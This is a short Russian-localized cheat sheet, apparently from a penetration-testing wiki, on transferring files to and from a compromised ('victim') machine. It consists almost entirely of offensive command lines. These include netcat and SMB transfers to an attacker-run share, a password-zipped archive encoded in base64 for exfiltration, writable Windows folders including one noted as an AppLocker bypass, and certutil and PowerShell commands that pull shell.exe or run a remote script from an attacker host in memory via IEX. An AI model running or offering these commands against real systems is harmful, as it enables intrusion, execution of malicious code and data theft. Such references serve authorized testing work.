Передача файлов
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Определите ОС жертвы, сетевые ограничения и доступные утилиты.
- Выберите канал передачи или тип шелла из раздела.
- Поднимите приёмник на своей стороне, выполните обмен и проверьте целостность.
- Синтаксис команд сохраняйте без перевода.
Методика
Linux
Folders with write permissions
/tmp/
/dev/shm/
nc
# Listening for the file to be transfered
nc -nlvp 4444 > file
# Transfer the file
nc -w 3 <DST_IP> 4444 < file
scp
# Download a file
scp [-r] <USER>@<IP>:<SRC_PATH> <DST_PATH>
# Upload a file
scp <SRC_PATH> <USER>@<IP>:<DST_PATH>
base64
zip -e -r exfil.zip dir_name
cat exfil.zip | base64 > exfil.txt
base64 -d exfil.txt > exfil.zip
unzip exfil.zip
Windows
Folders with write permissions
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\ # Allow bypass AppLocker
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
Certutil
certutil.exe -split -urlcache -f http://<IP>/file.exe f.ex
Powershell
powershell.exe Invoke-WebRequest -Uri "http://<ATTACKER_IP>/shell.exe" -OutFile notashell.exe
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/shell.ps1')"
SMB
#Kali
smbserver.py -smb2support a . -username guest -password password
#Victim
net use \\<YOUR_IP>\a password /USER:guest
copy <VICTIM_FILE> \\<YOUR_IP>\a\